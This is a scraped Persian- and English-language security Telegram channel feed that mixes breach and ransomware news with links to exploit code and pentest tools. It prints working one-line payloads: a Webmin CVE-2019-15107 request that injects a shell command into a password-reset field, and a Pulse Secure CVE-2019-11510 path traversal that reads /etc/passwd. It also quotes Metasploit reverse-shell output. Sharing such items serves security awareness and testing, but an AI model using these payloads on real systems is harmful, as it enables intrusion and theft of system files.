Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708
https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-
#windows
#rdp
#rce
@sec_nerd
https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-
#windows
#rdp
#rce
@sec_nerd
GitHub
GitHub - dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-: rce exploit , made to work with…
rce exploit , made to work with pocsuite3. Contribute to dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708- development by creating an account on GitHub.
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
نتایج یک مطالعه در گوگل نشان میدهد 1.5 درصد لاگین های انجام شده در فضای وب در معرض خطر انتشار در حملات هکرها هستند.
این تحقیق نشان میدهد بیشترین خطر متوجه وبسایتهای تجاری، سرویس های ایمیل و پیام رسان و شبکه های اجتماعی می باشد.
https://www.bleepingcomputer.com/news/security/google-estimates-15-percent-of-web-logins-exposed-in-data-breaches/
#google
#news
#privacy
@sec_nerd
این تحقیق نشان میدهد بیشترین خطر متوجه وبسایتهای تجاری، سرویس های ایمیل و پیام رسان و شبکه های اجتماعی می باشد.
https://www.bleepingcomputer.com/news/security/google-estimates-15-percent-of-web-logins-exposed-in-data-breaches/
#news
#privacy
@sec_nerd
BleepingComputer
Google Estimates 1.5% of Web Logins Exposed in Data Breaches
A study released by Google estimates that a 1.5% of all logins used across the web are vulnerable to credential stuffing attacks due to being disclosed in data breaches. While this percentage is quite small, when you take into consideration the total of amount…
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
Exploit Database
Webmin 1.920 - Remote Code Execution
Webmin 1.920 - Remote Code Execution. CVE-2019-15107 . webapps exploit for Linux platform
Breaking Into Your Company's Internal Network - SuiteCRM 7.11.4
https://blog.ripstech.com/2019/breaking-into-your-internal-network/
#writeup
#pentest
#web
@sec_nerd
https://blog.ripstech.com/2019/breaking-into-your-internal-network/
#writeup
#pentest
#web
@sec_nerd
حمله باج افزاری به ۲۲ اداره دولتی در تگزاس و درخواست ۲.۵ میلیون دلار باج از سوی عاملان این حمله!
https://www.databreachtoday.com/texas-says-22-local-government-agencies-hit-by-ransomware-a-12937
#news
#ransome
#usa
@sec_nerd
https://www.databreachtoday.com/texas-says-22-local-government-agencies-hit-by-ransomware-a-12937
#news
#ransome
#usa
@sec_nerd
Databreachtoday
Texas Says 22 Local Government Agencies Hit by Ransomware
Ransomware-wielding attackers continue to target not just big businesses and large government agencies, but increasingly their smaller counterparts too. In Texas,
جایگزین Responder برای سیستم عاملهای ویندوزی
C#
https://github.com/Kevin-Robertson/InveighZero
PS
https://github.com/Kevin-Robertson/Inveigh
#windows
#network
#sniff
#ntlm
#responder
#pivoting
@sec_nerd
C#
https://github.com/Kevin-Robertson/InveighZero
PS
https://github.com/Kevin-Robertson/Inveigh
#windows
#network
#sniff
#ntlm
#responder
#pivoting
@sec_nerd
امنیت اطلاعات
جایگزین Responder برای سیستم عاملهای ویندوزی C# https://github.com/Kevin-Robertson/InveighZero PS https://github.com/Kevin-Robertson/Inveigh #windows #network #sniff #ntlm #responder #pivoting @sec_nerd
Pulse Connect Secure
versions 9.0RX, 8.3RX, and 8.2RX
arbitrary file disclosure
CVE-2019-11510
exploit:
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
https://www.exploit-db.com/exploits/47297
#pulse
#vpn
#lfd
@sec_nerd
versions 9.0RX, 8.3RX, and 8.2RX
arbitrary file disclosure
CVE-2019-11510
exploit:
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
https://www.exploit-db.com/exploits/47297
#pulse
#vpn
#lfd
@sec_nerd
Exploit Database
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit). CVE-2019-11510 . webapps exploit for Multiple platform
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
This media is not supported in your browser
VIEW IN TELEGRAM
Subdomain enumeration tool to analyze domains and collect subdomains
https://github.com/Screetsec/Sudomy
#web
#pentest
#tools
#enum
#bugbounty
@sec_nerd
https://github.com/Screetsec/Sudomy
#web
#pentest
#tools
#enum
#bugbounty
@sec_nerd
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
https://github.com/projectzeroindia/CVE-2019-11510
pulse secure ssl vpn
CVE-2019-11510
#network
#pentest
#pulse
@sec_nerd
pulse secure ssl vpn
CVE-2019-11510
#network
#pentest
#pulse
@sec_nerd
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
https://github.com/rapid7/metasploit-framework/pull/12219
Backdoored Webmin 1.890
#msf
#webmin
#exploit
@sec_nerd
Backdoored Webmin 1.890
#msf
#webmin
#exploit
@sec_nerd
GitHub
Add Webmin password_change.cgi backdoor exploit by wvu-r7 · Pull Request #12219 · rapid7/metasploit-framework
Background
Please read https://www.webmin.com/exploit.html for full context.
Backdoored Webmin 1.890
msf5 exploit(unix/webapp/webmin_backdoor) > run
[*] Started reverse TCP handler on 172.28...
Please read https://www.webmin.com/exploit.html for full context.
Backdoored Webmin 1.890
msf5 exploit(unix/webapp/webmin_backdoor) > run
[*] Started reverse TCP handler on 172.28...
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
Telegram
Information Security
https://www.youtube.com/watch?v=v7JUMb70ON4
امنیت اطلاعات
#python #news @sec_nerd
https://developers.slashdot.org/story/19/08/24/2242248/uk-cybersecurity-agency-urges-devs-to-drop-python-2
#python
#news
@sec_nerd
#python
#news
@sec_nerd
developers.slashdot.org
UK Cybersecurity Agency Urges Devs To Drop Python 2
Python's End-of-Life date is 129 days away, warns the UK National Cyber Security Centre (NCSC). "There will be no more bug fixes, or security updates, from Python's core developers." An anonymous reader quotes ZDNet: The UK's cyber-security agency warned…